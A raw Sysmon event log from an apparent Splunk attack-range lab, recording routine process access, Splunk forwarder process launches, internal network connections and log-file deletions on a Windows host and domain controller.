11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1B5C-6216-8005-000000003902}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B5C-6216-8005-000000003902}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.896{4F8D34B0-1B5C-6216-8005-000000003902}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000224136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.567{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEDD6DE24B1F3B88F4C5A1C3FA63156,SHA256=5F99C491D82FD9C065A3039A499C8A043F27E01623CD3984ACABB47966699E3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B5C-6216-7F05-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224129Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1B5C-6216-7F05-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000224124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.223{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B5C-6216-7F05-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000224123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.224{4F8D34B0-1B5C-6216-7F05-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000224122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:41.604{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51834-false10.0.1.12-8000- 354300x8000000000000000300410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:41.602{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58960-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.541{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C9AD6F28AA19EEFDE89671D305F4301,SHA256=4F8559A1C290C8BA38BEBDD81E258FA839FDEC04FF18320633F632E5331FD853,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:45.582{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08D1726F11F514E343BB40F6983C1652,SHA256=454B4C723236C81CA006C4CE7707F167788F12F0D9BBD0A3948E6CBE6CCA0B13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:45.488{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 23542300x8000000000000000224152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:45.286{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEEF2AEEDD97FB39A8FA0B70D0E09051,SHA256=FBF74FF230E2282F5A3CF0259CF7C5374B686B8F35B2431696D0D42ADA374066,IMPHASH=00000000000000000000000000000000falsetrue 